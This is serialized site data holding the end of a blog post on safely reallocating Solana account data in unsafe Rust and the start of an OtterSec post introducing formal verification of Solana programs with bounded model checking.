"type":27,"tag":36,"props":25299,"children":25300},{},[25301,25303,25308],{"type":33,"value":25302},"We've seen how we could have ran into all sorts of issues here, with the usage of slice layout details, the reborrow creating an unbounded lifetime, and the ",{"type":27,"tag":84,"props":25304,"children":25306},{"className":25305},[],[25307],{"type":33,"value":22779},{"type":33,"value":25309}," borrow not accurately representing the actual usage of its contents. We can do better than this.",{"type":27,"tag":36,"props":25311,"children":25312},{},[25313,25315,25320,25322,25327,25329,25334,25336,25341,25343,25348,25350,25356,25358,25368,25370,25380],{"type":33,"value":25314},"First, let's deal with the ",{"type":27,"tag":84,"props":25316,"children":25318},{"className":25317},[],[25319],{"type":33,"value":22779},{"type":33,"value":25321}," borrowing issue. When we ",{"type":27,"tag":84,"props":25323,"children":25325},{"className":25324},[],[25326],{"type":33,"value":21150},{"type":33,"value":25328},", we get a ",{"type":27,"tag":84,"props":25330,"children":25332},{"className":25331},[],[25333],{"type":33,"value":24016},{"type":33,"value":25335}," back, which represents our borrow of the ",{"type":27,"tag":84,"props":25337,"children":25339},{"className":25338},[],[25340],{"type":33,"value":22779},{"type":33,"value":25342},"'s data. The fix here is simple: keep that ",{"type":27,"tag":84,"props":25344,"children":25346},{"className":25345},[],[25347],{"type":33,"value":24016},{"type":33,"value":25349}," around and use it to access the data, instead of using ",{"type":27,"tag":84,"props":25351,"children":25353},{"className":25352},[],[25354],{"type":33,"value":25355},"RefCell::as_ptr",{"type":33,"value":25357},". Next, the slice; again, the fix is simple. Instead of attempting to modify just the length field, and resorting to using layout information to do so since Rust slices are immutable, we can simply construct a new slice reference and set that. The Rust compiler",{"type":27,"tag":22749,"props":25359,"children":25360},{},[25361],{"type":27,"tag":47,"props":25362,"children":25366},{"href":25363,"ariaDescribedBy":25364,"dataFootnoteRef":7,"id":25365},"#user-content-fn-rustc-llvm",[22756],"user-content-fnref-rustc-llvm",[25367],{"type":33,"value":1693},{"type":33,"value":25369}," is smart enough to realize that the only thing changing is the length field, and so only emits the code to set the length",{"type":27,"tag":22749,"props":25371,"children":25372},{},[25373],{"type":27,"tag":47,"props":25374,"children":25378},{"href":25375,"ariaDescribedBy":25376,"dataFootnoteRef":7,"id":25377},"#user-content-fn-godbolt",[22756],"user-content-fnref-godbolt",[25379],{"type":33,"value":1152},{"type":33,"value":25381},". So then we get:",{"type":27,"tag":101,"props":25383,"children":25385},{"className":10270,"code":25384,"language":10269,"meta":7,"style":7},"let mut slice = self.try_borrow_mut_data()?;\n\n// First set new length in the serialized data\nlet ptr = unsafe { slice.as_mut_ptr().offset(-8) } as *mut u64;\nunsafe { *ptr = new_len as u64 };\n\n// Then set the new length in the local slice\n*slice = unsafe { std::slice::from_raw_parts_mut(slice.as_mut_ptr(), new_len) };\n",[25386],{"type":27,"tag":84,"props":25387,"children":25388},{"__ignoreMap":7},[25389,25433,25440,25447,25531,25571,25578,25585],{"type":27,"tag":207,"props":25390,"children":25391},{"class":209,"line":210},[25392,25396,25400,25405,25409,25413,25417,25421,25425,25429],{"type":27,"tag":207,"props":25393,"children":25394},{"style":214},[25395],{"type":33,"value":217},{"type":27,"tag":207,"props":25397,"children":25398},{"style":214},[25399],{"type":33,"value":10295},{"type":27,"tag":207,"props":25401,"children":25402},{"style":220},[25403],{"type":33,"value":25404}," slice",{"type":27,"tag":207,"props":25406,"children":25407},{"style":226},[25408],{"type":33,"value":229},{"type":27,"tag":207,"props":25410,"children":25411},{"style":214},[25412],{"type":33,"value":21073},{"type":27,"tag":207,"props":25414,"children":25415},{"style":226},[25416],{"type":33,"value":1041},{"type":27,"tag":207,"props":25418,"children":25419},{"style":1335},[25420],{"type":33,"value":21150},{"type":27,"tag":207,"props":25422,"children":25423},{"style":238},[25424],{"type":33,"value":21155},{"type":27,"tag":207,"props":25426,"children":25427},{"style":226},[25428],{"type":33,"value":10444},{"type":27,"tag":207,"props":25430,"children":25431},{"style":238},[25432],{"type":33,"value":241},{"type":27,"tag":207,"props":25434,"children":25435},{"class":209,"line":244},[25436],{"type":27,"tag":207,"props":25437,"children":25438},{"emptyLinePlaceholder":19},[25439],{"type":33,"value":2062},{"type":27,"tag":207,"props":25441,"children":25442},{"class":209,"line":270},[25443],{"type":27,"tag":207,"props":25444,"children":25445},{"style":4647},[25446],{"type":33,"value":21679},{"type":27,"tag":207,"props":25448,"children":25449},{"class":209,"line":296},[25450,25454,25458,25462,25466,25470,25474,25478,25482,25486,25490,25494,25498,25502,25506,25511,25515,25519,25523,25527],{"type":27,"tag":207,"props":25451,"children":25452},{"style":214},[25453],{"type":33,"value":217},{"type":27,"tag":207,"props":25455,"children":25456},{"style":220},[25457],{"type":33,"value":21133},{"type":27,"tag":207,"props":25459,"children":25460},{"style":226},[25461],{"type":33,"value":229},{"type":27,"tag":207,"props":25463,"children":25464},{"style":214},[25465],{"type":33,"value":21866},{"type":27,"tag":207,"props":25467,"children":25468},{"style":238},[25469],{"type":33,"value":16862},{"type":27,"tag":207,"props":25471,"children":25472},{"style":220},[25473],{"type":33,"value":22588},{"type":27,"tag":207,"props":25475,"children":25476},{"style":226},[25477],{"type":33,"value":1041},{"type":27,"tag":207,"props":25479,"children":25480},{"style":1335},[25481],{"type":33,"value":21164},{"type":27,"tag":207,"props":25483,"children":25484},{"style":238},[25485],{"type":33,"value":21155},{"type":27,"tag":207,"props":25487,"children":25488},{"style":226},[25489],{"type":33,"value":1041},{"type":27,"tag":207,"props":25491,"children":25492},{"style":1335},[25493],{"type":33,"value":21177},{"type":27,"tag":207,"props":25495,"children":25496},{"style":238},[25497],{"type":33,"value":1343},{"type":27,"tag":207,"props":25499,"children":25500},{"style":226},[25501],{"type":33,"value":11611},{"type":27,"tag":207,"props":25503,"children":25504},{"style":232},[25505],{"type":33,"value":3578},{"type":27,"tag":207,"props":25507,"children":25508},{"style":238},[25509],{"type":33,"value":25510},") } ",{"type":27,"tag":207,"props":25512,"children":25513},{"style":214},[25514],{"type":33,"value":16122},{"type":27,"tag":207,"props":25516,"children":25517},{"style":226},[25518],{"type":33,"value":17093},{"type":27,"tag":207,"props":25520,"children":25521},{"style":214},[25522],{"type":33,"value":11009},{"type":27,"tag":207,"props":25524,"children":25525},{"style":8920},[25526],{"type":33,"value":13142},{"type":27,"tag":207,"props":25528,"children":25529},{"style":238},[25530],{"type":33,"value":241},{"type":27,"tag":207,"props":25532,"children":25533},{"class":209,"line":445},[25534,25538,25542,25546,25550,25554,25558,25562,25566],{"type":27,"tag":207,"props":25535,"children":25536},{"style":214},[25537],{"type":33,"value":21632},{"type":27,"tag":207,"props":25539,"children":25540},{"style":238},[25541],{"type":33,"value":16862},{"type":27,"tag":207,"props":25543,"children":25544},{"style":226},[25545],{"type":33,"value":9286},{"type":27,"tag":207,"props":25547,"children":25548},{"style":220},[25549],{"type":33,"value":21225},{"type":27,"tag":207,"props":25551,"children":25552},{"style":226},[25553],{"type":33,"value":229},{"type":27,"tag":207,"props":25555,"children":25556},{"style":220},[25557],{"type":33,"value":21234},{"type":27,"tag":207,"props":25559,"children":25560},{"style":214},[25561],{"type":33,"value":16108},{"type":27,"tag":207,"props":25563,"children":25564},{"style":8920},[25565],{"type":33,"value":13142},{"type":27,"tag":207,"props":25567,"children":25568},{"style":238},[25569],{"type":33,"value":25570}," };\n",{"type":27,"tag":207,"props":25572,"children":25573},{"class":209,"line":867},[25574],{"type":27,"tag":207,"props":25575,"children":25576},{"emptyLinePlaceholder":19},[25577],{"type":33,"value":2062},{"type":27,"tag":207,"props":25579,"children":25580},{"class":209,"line":892},[25581],{"type":27,"tag":207,"props":25582,"children":25583},{"style":4647},[25584],{"type":33,"value":23415},{"type":27,"tag":207,"props":25586,"children":25587},{"class":209,"line":1475},[25588,25592,25596,25600,25604,25609,25613,25617,25621,25626,25630,25634,25638,25642,25647,25651],{"type":27,"tag":207,"props":25589,"children":25590},{"style":226},[25591],{"type":33,"value":9286},{"type":27,"tag":207,"props":25593,"children":25594},{"style":220},[25595],{"type":33,"value":22588},{"type":27,"tag":207,"props":25597,"children":25598},{"style":226},[25599],{"type":33,"value":229},{"type":27,"tag":207,"props":25601,"children":25602},{"style":214},[25603],{"type":33,"value":21866},{"type":27,"tag":207,"props":25605,"children":25606},{"style":238},[25607],{"type":33,"value":25608}," { std",{"type":27,"tag":207,"props":25610,"children":25611},{"style":226},[25612],{"type":33,"value":10768},{"type":27,"tag":207,"props":25614,"children":25615},{"style":238},[25616],{"type":33,"value":22588},{"type":27,"tag":207,"props":25618,"children":25619},{"style":226},[25620],{"type":33,"value":10768},{"type":27,"tag":207,"props":25622,"children":25623},{"style":1335},[25624],{"type":33,"value":25625},"from_raw_parts_mut",{"type":27,"tag":207,"props":25627,"children":25628},{"style":238},[25629],{"type":33,"value":1343},{"type":27,"tag":207,"props":25631,"children":25632},{"style":220},[25633],{"type":33,"value":22588},{"type":27,"tag":207,"props":25635,"children":25636},{"style":226},[25637],{"type":33,"value":1041},{"type":27,"tag":207,"props":25639,"children":25640},{"style":1335},[25641],{"type":33,"value":21164},{"type":27,"tag":207,"props":25643,"children":25644},{"style":238},[25645],{"type":33,"value":25646},"(), ",{"type":27,"tag":207,"props":25648,"children":25649},{"style":220},[25650],{"type":33,"value":20999},{"type":27,"tag":207,"props":25652,"children":25653},{"style":238},[25654],{"type":33,"value":22021},{"type":27,"tag":36,"props":25656,"children":25657},{},[25658,25660,25665,25667,25672,25674,25679,25681],{"type":33,"value":25659},"No more pointer casting except for the one place that actually needs it (since the ABI for the serialized buffer uses a ",{"type":27,"tag":84,"props":25661,"children":25663},{"className":25662},[],[25664],{"type":33,"value":15323},{"type":33,"value":25666}," and not a ",{"type":27,"tag":84,"props":25668,"children":25670},{"className":25669},[],[25671],{"type":33,"value":23876},{"type":33,"value":25673}," for the size field, given that ",{"type":27,"tag":84,"props":25675,"children":25677},{"className":25676},[],[25678],{"type":33,"value":23876},{"type":33,"value":25680}," is architecture-dependent), and no dependency on slice reference internals!",{"type":27,"tag":22749,"props":25682,"children":25683},{},[25684],{"type":27,"tag":47,"props":25685,"children":25689},{"href":25686,"ariaDescribedBy":25687,"dataFootnoteRef":7,"id":25688},"#user-content-fn-slice-unbound-lifetime",[22756],"user-content-fnref-slice-unbound-lifetime",[25690],{"type":33,"value":2693},{"type":27,"tag":25692,"props":25693,"children":25696},"section",{"className":25694,"dataFootnotes":7},[25695],"footnotes",[25697,25704],{"type":27,"tag":28,"props":25698,"children":25701},{"className":25699,"id":22756},[25700],"sr-only",[25702],{"type":33,"value":25703},"Footnotes",{"type":27,"tag":12719,"props":25705,"children":25706},{},[25707,25811,25829,25884,25897,25925],{"type":27,"tag":1232,"props":25708,"children":25710},{"id":25709},"user-content-fn-rc-refs",[25711,25713,25719,25721,25726,25728,25732,25734,25738,25740,25745,25747,25753,25755,25760,25762,25772,25774,25779,25781,25786,25788,25793,25795,25801,25802],{"type":33,"value":25712},"I find it helpful to view owning an ",{"type":27,"tag":84,"props":25714,"children":25716},{"className":25715},[],[25717],{"type":33,"value":25718},"Rc\u003CT>",{"type":33,"value":25720}," as holding a shared reference to the underlying ",{"type":27,"tag":84,"props":25722,"children":25724},{"className":25723},[],[25725],{"type":33,"value":13269},{"type":33,"value":25727}," (stored in the magical land of I-don't-need-to-care-about-this-object-not-living-long-enough known as the heap). Owning the ",{"type":27,"tag":942,"props":25729,"children":25730},{},[25731],{"type":33,"value":23733},{"type":33,"value":25733}," ensures that the actual ",{"type":27,"tag":942,"props":25735,"children":25736},{},[25737],{"type":33,"value":9468},{"type":33,"value":25739}," stays alive, however all you have is a reference to the ",{"type":27,"tag":84,"props":25741,"children":25743},{"className":25742},[],[25744],{"type":33,"value":13269},{"type":33,"value":25746}," (through the ",{"type":27,"tag":84,"props":25748,"children":25750},{"className":25749},[],[25751],{"type":33,"value":25752},"Deref\u003CTarget = T>",{"type":33,"value":25754}," impl) - ",{"type":27,"tag":942,"props":25756,"children":25757},{},[25758],{"type":33,"value":25759},"not",{"type":33,"value":25761}," ownership ",{"type":27,"tag":942,"props":25763,"children":25764},{},[25765,25767],{"type":33,"value":25766},"of the ",{"type":27,"tag":84,"props":25768,"children":25770},{"className":25769},[],[25771],{"type":33,"value":13269},{"type":33,"value":25773},". In short, owning an ",{"type":27,"tag":84,"props":25775,"children":25777},{"className":25776},[],[25778],{"type":33,"value":25718},{"type":33,"value":25780}," is owning a (shared, read-only) reference to ",{"type":27,"tag":84,"props":25782,"children":25784},{"className":25783},[],[25785],{"type":33,"value":13269},{"type":33,"value":25787},", not owning ",{"type":27,"tag":84,"props":25789,"children":25791},{"className":25790},[],[25792],{"type":33,"value":13269},{"type":33,"value":25794}," directly like with ",{"type":27,"tag":84,"props":25796,"children":25798},{"className":25797},[],[25799],{"type":33,"value":25800},"Box\u003CT>",{"type":33,"value":1055},{"type":27,"tag":47,"props":25803,"children":25808},{"href":25804,"ariaLabel":25805,"className":25806,"dataFootnoteBackref":7},"#user-content-fnref-rc-refs","Back to reference 1",[25807],"data-footnote-backref",[25809],{"type":33,"value":25810},"↩",{"type":27,"tag":1232,"props":25812,"children":25814},{"id":25813},"user-content-fn-sendsync",[25815,25821,25822],{"type":27,"tag":84,"props":25816,"children":25818},{"className":25817},[],[25819],{"type":33,"value":25820},"!Send + !Sync",{"type":33,"value":13740},{"type":27,"tag":47,"props":25823,"children":25827},{"href":25824,"ariaLabel":25825,"className":25826,"dataFootnoteBackref":7},"#user-content-fnref-sendsync","Back to reference 2",[25807],[25828],{"type":33,"value":25810},{"type":27,"tag":1232,"props":25830,"children":25832},{"id":25831},"user-content-fn-layout",[25833,25835,25840,25841,25854,25856,25861,25863,25868,25870,25875,25877],{"type":33,"value":25834},"Note that this is a terrible idea for yet another reason: ",{"type":27,"tag":84,"props":25836,"children":25838},{"className":25837},[],[25839],{"type":33,"value":22213},{"type":33,"value":12784},{"type":27,"tag":47,"props":25842,"children":25845},{"href":25843,"rel":25844},"https://docs.rs/solana-program/1.10.30/src/solana_program/account_info.rs.html#15-33",[51],[25846,25848],{"type":33,"value":25847},"not declared with ",{"type":27,"tag":84,"props":25849,"children":25851},{"className":25850},[],[25852],{"type":33,"value":25853},"#[repr(C)]",{"type":33,"value":25855},", meaning that, once again, we're dealing with no layout guarantees. But thanks to the power of blockchain, fixing this ABI interface ",{"type":27,"tag":942,"props":25857,"children":25858},{},[25859],{"type":33,"value":25860},"breaks the entire chain",{"type":33,"value":25862}," since old contracts will no longer work. So, we're stuck with cobbling together ",{"type":27,"tag":942,"props":25864,"children":25865},{},[25866],{"type":33,"value":25867},"some",{"type":33,"value":25869}," kind of interface to the specific layout of the specific ",{"type":27,"tag":84,"props":25871,"children":25873},{"className":25872},[],[25874],{"type":33,"value":23784},{"type":33,"value":25876}," versions used to build on-chain code for all eternity... ",{"type":27,"tag":47,"props":25878,"children":25882},{"href":25879,"ariaLabel":25880,"className":25881,"dataFootnoteBackref":7},"#user-content-fnref-layout","Back to reference 3",[25807],[25883],{"type":33,"value":25810},{"type":27,"tag":1232,"props":25885,"children":25887},{"id":25886},"user-content-fn-rustc-llvm",[25888,25890],{"type":33,"value":25889},"Actually, it's LLVM that does the optimization ",{"type":27,"tag":47,"props":25891,"children":25895},{"href":25892,"ariaLabel":25893,"className":25894,"dataFootnoteBackref":7},"#user-content-fnref-rustc-llvm","Back to reference 4",[25807],[25896],{"type":33,"value":25810},{"type":27,"tag":1232,"props":25898,"children":25900},{"id":25899},"user-content-fn-godbolt",[25901,25908,25910,25916,25918],{"type":27,"tag":47,"props":25902,"children":25905},{"href":25903,"rel":25904},"https://godbolt.org/z/PK46xMbxc",[51],[25906],{"type":33,"value":25907},"Click here",{"type":33,"value":25909}," for a Compiler Explorer link showing this - note that the code for both implementations is almost identical. And yes, it's x86_64 and not eBPF, but unfortunately Compiler Explorer doesn't have Rust ",{"type":27,"tag":84,"props":25911,"children":25913},{"className":25912},[],[25914],{"type":33,"value":25915},"libcore",{"type":33,"value":25917}," available for other architectures yet. ",{"type":27,"tag":47,"props":25919,"children":25923},{"href":25920,"ariaLabel":25921,"className":25922,"dataFootnoteBackref":7},"#user-content-fnref-godbolt","Back to reference 5",[25807],[25924],{"type":33,"value":25810},{"type":27,"tag":1232,"props":25926,"children":25928},{"id":25927},"user-content-fn-slice-unbound-lifetime",[25929,25931,25936,25938,25944,25946,25952,25954,25960,25962,25968,25970,25976,25978,25983,25985],{"type":33,"value":25930},"The astute reader may have noticed that ",{"type":27,"tag":84,"props":25932,"children":25934},{"className":25933},[],[25935],{"type":33,"value":25625},{"type":33,"value":25937}," still returns an unbounded lifetime (notice in the signature ",{"type":27,"tag":84,"props":25939,"children":25941},{"className":25940},[],[25942],{"type":33,"value":25943},"unsafe fn from_raw_parts_mut\u003C'a, T>(data: *mut T, len: usize) -> &'a mut [T]",{"type":33,"value":25945},", the lifetime parameter ",{"type":27,"tag":84,"props":25947,"children":25949},{"className":25948},[],[25950],{"type":33,"value":25951},"'a",{"type":33,"value":25953}," does not appear in the arguments). However, we immediately constrain the lifetime by assigning it to ",{"type":27,"tag":84,"props":25955,"children":25957},{"className":25956},[],[25958],{"type":33,"value":25959},"*slice",{"type":33,"value":25961},", which is ",{"type":27,"tag":84,"props":25963,"children":25965},{"className":25964},[],[25966],{"type":33,"value":25967},"&'info [u8]",{"type":33,"value":25969}," (where ",{"type":27,"tag":84,"props":25971,"children":25973},{"className":25972},[],[25974],{"type":33,"value":25975},"'info",{"type":33,"value":25977}," is the lifetime parameter of the ",{"type":27,"tag":84,"props":25979,"children":25981},{"className":25980},[],[25982],{"type":33,"value":22213},{"type":33,"value":25984}," struct) - this is exactly the lifetime we started with. ",{"type":27,"tag":47,"props":25986,"children":25990},{"href":25987,"ariaLabel":25988,"className":25989,"dataFootnoteBackref":7},"#user-content-fnref-slice-unbound-lifetime","Back to reference 6",[25807],[25991],{"type":33,"value":25810},{"type":27,"tag":10127,"props":25993,"children":25994},{},[25995],{"type":33,"value":10131},{"title":7,"searchDepth":244,"depth":244,"links":25997},[25998,26004,26008,26009,26011],{"id":21644,"depth":244,"text":25999,"children":26000},"Breaking down realloc",[26001,26002],{"id":21810,"depth":270,"text":21813},{"id":23167,"depth":270,"text":26003},"Back to realloc",{"id":24118,"depth":244,"text":24121,"children":26005},[26006,26007],{"id":24124,"depth":270,"text":24127},{"id":24345,"depth":270,"text":24348},{"id":24530,"depth":244,"text":24533},{"id":24930,"depth":244,"text":26010},"Towards safer unsafe",{"id":22756,"depth":244,"text":25703},"content:blog:2022-12-09-rust-realloc-and-references.md","blog/2022-12-09-rust-realloc-and-references.md","blog/2022-12-09-rust-realloc-and-references",{"_path":26016,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":26017,"description":26018,"author":26019,"image":26020,"date":26022,"isFeatured":19,"onBlogPage":19,"tags":26023,"body":26024,"_type":10152,"_id":36265,"_source":10154,"_file":36266,"_stem":36267,"_extension":10157},"/blog/2023-01-26-formally-verifying-solana-programs","Solana Formal Verification: A Case Study","We present a novel framework for formal verification of Solana Anchor programs — and a case study application to the Squads multisig.","harrison",{"src":26021,"height":20900,"width":18},"/posts/formally-verifying-solana-programs/formal-verification-title.jpg","2023-01-26",[10169,10170],{"type":24,"children":26025,"toc":36237},[26026,26031,26036,26062,26066,26078,26101,26124,26136,26159,26162,26169,26218,26224,26230,26235,26246,26287,26292,26298,26303,26536,26556,26561,26566,26639,26644,26714,26728,27153,27173,27179,27198,27203,27208,27213,27219,27231,27266,27277,27288,27300,27305,27337,27361,27380,27386,27403,27409,27436,27441,27461,27473,27619,27647,27650,27662,27745,27764,27767,27806,27973,27978,27984,27996,28015,28028,28189,28201,28214,28688,28693,28740,28746,28764,28833,29071,29285,29290,29364,29412,29417,29423,29525,29629,29634,29697,29702,29708,29773,29778,29820,29846,29852,29921,29926,29976,29987,29993,30004,30025,30030,30035,30058,30064,30076,30096,31192,31211,31262,31267,31275,31287,31292,31300,31305,31321,31357,31362,31456,31461,31469,31474,31586,31591,31599,31612,31776,31781,31789,31794,31799,31867,31901,31907,31912,31923,31941,32319,32331,32343,32351,32362,32393,32398,32406,32411,32684,32703,32708,32734,33602,33614,33713,33725,33767,33772,33784,33792,33797,33809,33835,33995,34007,34015,34020,34296,34301,34313,34468,34488,34814,34848,35042,35075,35087,35209,35229,35234,35239,35244,35257,35265,35270,35745,35757,35762,35774,35779,36038,36064,36069,36075,36081,36093,36105,36124,36171,36176,36182,36187,36192,36197,36201,36206,36211,36214,36233],{"type":27,"tag":36,"props":26027,"children":26028},{},[26029],{"type":33,"value":26030},"Since the early days of computing, bugs have crept their way into programs and wreaked havoc on the intentions of the programmer. Logical fallacies, race conditions, or simple typos could manifest as crashes or lay undetected, silently breaking the functionality of the host program.",{"type":27,"tag":36,"props":26032,"children":26033},{},[26034],{"type":33,"value":26035},"When your program is connected to the internet, there is the new risk that bugs may introduce security holes into your system. Even simple buffer overflows can be exploited by skilled attackers to compromise the integrity of your program.",{"type":27,"tag":36,"props":26037,"children":26038},{},[26039,26041,26045,26047,26052,26054,26061],{"type":33,"value":26040},"In the world of Web3 we create programs that talk to strangers ",{"type":27,"tag":942,"props":26042,"children":26043},{},[26044],{"type":33,"value":23647},{"type":33,"value":26046}," control millions of dollars 🤑. Bugs in these programs are some of the ",{"type":27,"tag":942,"props":26048,"children":26049},{},[26050],{"type":33,"value":26051},"juciest",{"type":33,"value":26053},"; anonymous attackers that can find and exploit them will walk away with potentially ",{"type":27,"tag":47,"props":26055,"children":26058},{"href":26056,"rel":26057},"https://rekt.news/leaderboard/",[51],[26059],{"type":33,"value":26060},"hundreds of millions of dollars",{"type":33,"value":1041},{"type":27,"tag":26063,"props":26064,"children":26065},"hr",{},[],{"type":27,"tag":36,"props":26067,"children":26068},{},[26069,26071,26076],{"type":33,"value":26070},"At OtterSec we are ",{"type":27,"tag":942,"props":26072,"children":26073},{},[26074],{"type":33,"value":26075},"highly skilled in pest control",{"type":33,"value":26077}," - finding and squashing bugs before they are exploited by less well-intentioned hackers. We are constantly striving to improve our techniques and develop new technologies that aid in our auditing processes.",{"type":27,"tag":36,"props":26079,"children":26080},{},[26081,26083,26090,26092,26099],{"type":33,"value":26082},"Recently we were contacted by the ",{"type":27,"tag":47,"props":26084,"children":26087},{"href":26085,"rel":26086},"https://squads.so/",[51],[26088],{"type":33,"value":26089},"Squads team",{"type":33,"value":26091}," to explore how formal verification could be used to verify security-critical properties of Solana programs. We were really excited about this opportunity and have been developing a prototype with the ",{"type":27,"tag":47,"props":26093,"children":26096},{"href":26094,"rel":26095},"https://github.com/Squads-Protocol/squads-mpl",[51],[26097],{"type":33,"value":26098},"Squads Multisig Program",{"type":33,"value":26100}," as our main case study.",{"type":27,"tag":36,"props":26102,"children":26103},{},[26104,26106,26113,26115,26122],{"type":33,"value":26105},"We now have a (mostly) working prototype that can be used to formally verify critical properties of Solana programs in order to ensure a higher level of security. Our tool integrates with ",{"type":27,"tag":47,"props":26107,"children":26110},{"href":26108,"rel":26109},"https://www.anchor-lang.com/",[51],[26111],{"type":33,"value":26112},"anchor-lang",{"type":33,"value":26114}," and provides new APIs to specify invariants for your Solana code. It then autogenerates proof harnesses which are verified with the ",{"type":27,"tag":47,"props":26116,"children":26119},{"href":26117,"rel":26118},"https://github.com/model-checking/kani",[51],[26120],{"type":33,"value":26121},"Kani Rust Verifier",{"type":33,"value":26123},". Additionally, we are implementing a formal-verification-friendly runtime SDK layer that accelerates the expensive process of running formal verification tools on complex code.",{"type":27,"tag":36,"props":26125,"children":26126},{},[26127,26129,26134],{"type":33,"value":26128},"In this blog post, we're excited to share our progress and the challenges we've encountered during the process. We will describe the main concepts behind ",{"type":27,"tag":942,"props":26130,"children":26131},{},[26132],{"type":33,"value":26133},"bounded model checking",{"type":33,"value":26135}," (our formal verification method of choice) and explain how we've applied these concepts to Solana.",{"type":27,"tag":36,"props":26137,"children":26138},{},[26139],{"type":27,"tag":942,"props":26140,"children":26141},{},[26142,26144,26151,26153],{"type":33,"value":26143},"If you're interested in learning more or getting your own programs formally verified, let us know! We'd be excited to chat with you! — Fill out ",{"type":27,"tag":47,"props":26145,"children":26148},{"href":26146,"rel":26147},"https://osec.io/contact",[51],[26149],{"type":33,"value":26150},"this form",{"type":33,"value":26152}," or email us at ",{"type":27,"tag":47,"props":26154,"children":26156},{"href":26155},"mailto:contact@osec.io",[26157],{"type":33,"value":26158},"contact@osec.io",{"type":27,"tag":26063,"props":26160,"children":26161},{},[],{"type":27,"tag":26163,"props":26164,"children":26166},"h4",{"id":26165},"contents",[26167],{"type":33,"value":26168},"Contents:",{"type":27,"tag":12719,"props":26170,"children":26171},{},[26172,26177,26194,26204,26209,26214],{"type":27,"tag":1232,"props":26173,"children":26174},{},[26175],{"type":33,"value":26176},"Formal Verification with Bounded Model Checking\na. Overview\nb. A simple example\nc. Loop bounds & path explosion\nd. The Kani Rust Verifier",{"type":27,"tag":1232,"props":26178,"children":26179},{},[26180,26185,26187,26192],{"type":27,"tag":12606,"props":26181,"children":26182},{},[26183],{"type":33,"value":26184},"Specification",{"type":33,"value":26186},": How can we describe what we ",{"type":27,"tag":942,"props":26188,"children":26189},{},[26190],{"type":33,"value":26191},"want",{"type":33,"value":26193}," our program to do?",{"type":27,"tag":1232,"props":26195,"children":26196},{},[26197,26202],{"type":27,"tag":12606,"props":26198,"children":26199},{},[26200],{"type":33,"value":26201},"Verification",{"type":33,"value":26203},": How do we check that our model is correct?",{"type":27,"tag":1232,"props":26205,"children":26206},{},[26207],{"type":33,"value":26208},"Case Study: Squads Multisig",{"type":27,"tag":1232,"props":26210,"children":26211},{},[26212],{"type":33,"value":26213},"Additional challenges in Solana",{"type":27,"tag":1232,"props":26215,"children":26216},{},[26217],{"type":33,"value":10115},{"type":27,"tag":28,"props":26219,"children":26221},{"id":26220},"formal-verification-with-bounded-model-checking",[26222],{"type":33,"value":26223},"Formal Verification with Bounded Model Checking",{"type":27,"tag":58,"props":26225,"children":26227},{"id":26226},"overview",[26228],{"type":33,"value":26229},"Overview",{"type":27,"tag":36,"props":26231,"children":26232},{},[26233],{"type":33,"value":26234},"Formal verification is the process of using a formal specification to verify the correctness of a system. In this case, the systems we are verifying are programs written in Rust that run on the Solana blockchain.",{"type":27,"tag":36,"props":26236,"children":26237},{},[26238,26240,26245],{"type":33,"value":26239},"There are many different flavors of formal verification, however in this research we are using ",{"type":27,"tag":12606,"props":26241,"children":26242},{},[26243],{"type":33,"value":26244},"bounded model checking (BMC)",{"type":33,"value":1041},{"type":27,"tag":36,"props":26247,"children":26248},{},[26249,26251,26256,26258,26263,26265,26269,26271,26277,26279,26285],{"type":33,"value":26250},"In short, the idea of BMC is to execute our program ",{"type":27,"tag":942,"props":26252,"children":26253},{},[26254],{"type":33,"value":26255},"symbolically",{"type":33,"value":26257}," rather than ",{"type":27,"tag":942,"props":26259,"children":26260},{},[26261],{"type":33,"value":26262},"concretely",{"type":33,"value":26264},". Instead of actually performing an ",{"type":27,"tag":942,"props":26266,"children":26267},{},[26268],{"type":33,"value":16914},{"type":33,"value":26270}," when we see the line ",{"type":27,"tag":84,"props":26272,"children":26274},{"className":26273},[],[26275],{"type":33,"value":26276},"int x = a + b",{"type":33,"value":26278},", we store the symbolic expression ",{"type":27,"tag":84,"props":26280,"children":26282},{"className":26281},[],[26283],{"type":33,"value":26284},"x == a + b",{"type":33,"value":26286},". We do this for every line and once we reach the end of the program we have compiled a huge list of symbolic expressions. At this point, we can feed these expressions to a SMT solver along with a correctness property P in order to check if our program satisfies this property.",{"type":27,"tag":36,"props":26288,"children":26289},{},[26290],{"type":33,"value":26291},"If we hit a branch as we are tracing the program, we will take both sides of the branch adding the positive branch condition as a constraint to one side and the negative condition to the other side.",{"type":27,"tag":58,"props":26293,"children":26295},{"id":26294},"a-simple-example",[26296],{"type":33,"value":26297},"A simple example",{"type":27,"tag":36,"props":26299,"children":26300},{},[26301],{"type":33,"value":26302},"As an example, consider the following function:",{"type":27,"tag":101,"props":26304,"children":26306},{"code":26305,"language":10435,"meta":7,"className":23789,"style":7},"int foo(int x) {\n int y = x + 3;\n int z;\n if (y > 100) {\n z = y * 2;\n } else {\n z = y + 1;\n }\n\n // Property P:\n assert(z != 105);\n}\n",[26307],{"type":27,"tag":84,"props":26308,"children":26309},{"__ignoreMap":7},[26310,26340,26374,26386,26411,26439,26454,26481,26488,26495,26503,26529],{"type":27,"tag":207,"props":26311,"children":26312},{"class":209,"line":210},[26313,26318,26323,26327,26331,26336],{"type":27,"tag":207,"props":26314,"children":26315},{"style":214},[26316],{"type":33,"value":26317},"int",{"type":27,"tag":207,"props":26319,"children":26320},{"style":1335},[26321],{"type":33,"value":26322}," foo",{"type":27,"tag":207,"props":26324,"children":26325},{"style":238},[26326],{"type":33,"value":1343},{"type":27,"tag":207,"props":26328,"children":26329},{"style":214},[26330],{"type":33,"value":26317},{"type":27,"tag":207,"props":26332,"children":26333},{"style":220},[26334],{"type":33,"value":26335}," x",{"type":27,"tag":207,"props":26337,"children":26338},{"style":238},[26339],{"type":33,"value":1424},{"type":27,"tag":207,"props":26341,"children":26342},{"class":209,"line":244},[26343,26348,26352,26356,26361,26365,26370],{"type":27,"tag":207,"props":26344,"children":26345},{"style":214},[26346],{"type":33,"value":26347}," int",{"type":27,"tag":207,"props":26349,"children":26350},{"style":238},[26351],{"type":33,"value":11797},{"type":27,"tag":207,"props":26353,"children":26354},{"style":226},[26355],{"type":33,"value":10380},{"type":27,"tag":207,"props":26357,"children":26358},{"style":238},[26359],{"type":33,"value":26360}," x ",{"type":27,"tag":207,"props":26362,"children":26363},{"style":226},[26364],{"type":33,"value":2227},{"type":27,"tag":207,"props":26366,"children":26367},{"style":232},[26368],{"type":33,"value":26369}," 